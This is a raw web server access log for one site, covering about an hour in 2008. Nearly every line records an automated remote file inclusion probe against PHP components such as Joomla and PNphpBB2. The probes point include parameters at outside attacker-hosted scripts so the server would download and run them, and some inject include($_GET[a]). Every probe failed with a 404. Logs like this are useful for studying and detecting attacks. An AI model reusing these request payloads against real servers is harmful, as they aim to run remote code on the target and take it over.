204.10.243.102 - - [31/Mar/2008:22:31:40 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.bsfadvisors.com"
204.10.243.102 - - [31/Mar/2008:22:31:40 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:31:47 -0700] "GET /logs/access.log//forums//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../spread.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:31:49 -0700] "GET //forums//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../spread.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:31:50 -0700] "GET /logs//forums//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../spread.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
62.163.141.54 - - [31/Mar/2008:22:32:14 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:22:33:09 -0700] "GET /logs/access.log/componentscom_performsperforms.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:22:33:09 -0700] "GET /componentscom_performsperforms.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:22:33:09 -0700] "GET /logs/componentscom_performsperforms.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
204.10.243.102 - - [31/Mar/2008:22:34:15 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.bsfadvisors.com"
204.10.243.102 - - [31/Mar/2008:22:34:15 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.bsfadvisors.com"
66.7.205.115 - - [31/Mar/2008:22:35:44 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.interkros.cz/images/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.114.132.12 - - [31/Mar/2008:22:42:04 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.geocities.com/bornok911/mytest.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.bsfadvisors.com"
85.114.132.12 - - [31/Mar/2008:22:42:05 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.geocities.com/bornok911/mytest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.bsfadvisors.com"
85.114.132.12 - - [31/Mar/2008:22:42:05 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.geocities.com/bornok911/mytest.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.bsfadvisors.com"
85.114.132.12 - - [31/Mar/2008:22:42:05 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.geocities.com/bornok911/mytest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.bsfadvisors.com"
69.93.107.242 - - [31/Mar/2008:22:47:13 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.107.242 - - [31/Mar/2008:22:47:13 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.107.242 - - [31/Mar/2008:22:47:14 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.107.242 - - [31/Mar/2008:22:47:53 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.65.97 - - [31/Mar/2008:22:54:17 -0700] "GET /logs/main.php3?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.65.97 - - [31/Mar/2008:22:54:17 -0700] "GET /main.php3?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:22:55:27 -0700] "GET /logs/main.php3?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:22:55:27 -0700] "GET /main.php3?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:59:27 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.avedila.com/avedila/.../spread.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:59:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.avedila.com/avedila/.../spread.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:22:59:31 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.avedila.com/avedila/.../spread.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
62.50.14.189 - - [31/Mar/2008:23:05:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.50.14.189 - - [31/Mar/2008:23:05:54 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
83.205.101.218 - - [31/Mar/2008:23:08:23 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://www.avedila.com/avedila/.../puki.jpg???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.bsfadvisors.com"
83.205.101.218 - - [31/Mar/2008:23:08:30 -0700] "GET //includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://www.avedila.com/avedila/.../puki.jpg???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.bsfadvisors.com"
83.205.101.218 - - [31/Mar/2008:23:08:38 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://www.avedila.com/avedila/.../puki.jpg???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:23:09:02 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../spread.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:23:09:04 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../spread.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:23:09:06 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../spread.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
65.55.208.108 - - [31/Mar/2008:23:09:47 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.bsfadvisors.com"
65.55.208.108 - - [31/Mar/2008:23:09:47 -0700] "GET /?M=A HTTP/1.1" 200 1180 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.bsfadvisors.com"
66.55.132.6 - - [31/Mar/2008:23:10:07 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.geocities.com/bornok911/mytest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.bsfadvisors.com"
66.55.132.6 - - [31/Mar/2008:23:10:07 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.geocities.com/bornok911/mytest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.bsfadvisors.com"
62.50.14.189 - - [31/Mar/2008:23:13:21 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.50.14.189 - - [31/Mar/2008:23:13:21 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.50.14.189 - - [31/Mar/2008:23:13:21 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:23:17:24 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:23:17:27 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
205.234.200.232 - - [31/Mar/2008:23:20:41 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.200.232 - - [31/Mar/2008:23:20:41 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.200.232 - - [31/Mar/2008:23:20:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:23:20:45 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:23:20:47 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
70.85.140.90 - - [31/Mar/2008:23:21:56 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
70.85.140.90 - - [31/Mar/2008:23:21:56 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
70.85.140.90 - - [31/Mar/2008:23:21:56 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
66.40.65.240 - - [31/Mar/2008:23:22:43 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
66.40.65.240 - - [31/Mar/2008:23:22:43 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
66.40.65.240 - - [31/Mar/2008:23:22:43 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
207.58.166.231 - - [31/Mar/2008:23:23:58 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
207.58.166.231 - - [31/Mar/2008:23:23:59 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
207.58.166.231 - - [31/Mar/2008:23:23:59 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.17.105.186 - - [31/Mar/2008:23:23:59 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.17.105.186 - - [31/Mar/2008:23:23:59 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.17.105.186 - - [31/Mar/2008:23:23:59 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.17.105.186 - - [31/Mar/2008:23:24:45 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.17.105.186 - - [31/Mar/2008:23:24:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [31/Mar/2008:23:25:26 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [31/Mar/2008:23:25:27 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [31/Mar/2008:23:25:27 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
87.118.102.153 - - [31/Mar/2008:23:26:33 -0700] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.bsfadvisors.com"
87.118.102.153 - - [31/Mar/2008:23:26:33 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.bsfadvisors.com"
80.93.56.181 - - [31/Mar/2008:23:29:53 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [31/Mar/2008:23:29:53 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [31/Mar/2008:23:30:03 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [31/Mar/2008:23:30:03 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [31/Mar/2008:23:30:03 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.11.67.242 - - [31/Mar/2008:23:30:12 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [31/Mar/2008:23:30:13 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [31/Mar/2008:23:30:13 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
89.108.66.198 - - [31/Mar/2008:23:30:25 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.66.198 - - [31/Mar/2008:23:30:26 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.11.67.242 - - [31/Mar/2008:23:30:27 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [31/Mar/2008:23:30:27 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [31/Mar/2008:23:30:27 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
216.131.64.221 - - [31/Mar/2008:23:30:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.107.242 - - [31/Mar/2008:23:30:44 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
89.108.66.198 - - [31/Mar/2008:23:31:13 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.66.198 - - [31/Mar/2008:23:31:13 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.66.198 - - [31/Mar/2008:23:31:13 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.148.95.154 - - [31/Mar/2008:23:31:48 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.148.95.154 - - [31/Mar/2008:23:31:49 -0700] "GET //Neos_Chronos/header.php?base_folder=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.148.95.154 - - [31/Mar/2008:23:31:49 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
210.118.170.87 - - [31/Mar/2008:23:31:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [31/Mar/2008:23:31:52 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:23:32:17 -0700] "GET /logs/access.log/index.php?theme=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:23:32:17 -0700] "GET /index.php?theme=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:23:32:18 -0700] "GET /logs/index.php?theme=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.131.64.221 - - [31/Mar/2008:23:33:22 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.131.64.221 - - [31/Mar/2008:23:33:23 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.131.64.221 - - [31/Mar/2008:23:33:23 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.72.215.178 - - [31/Mar/2008:23:33:48 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [31/Mar/2008:23:33:48 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [31/Mar/2008:23:33:48 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
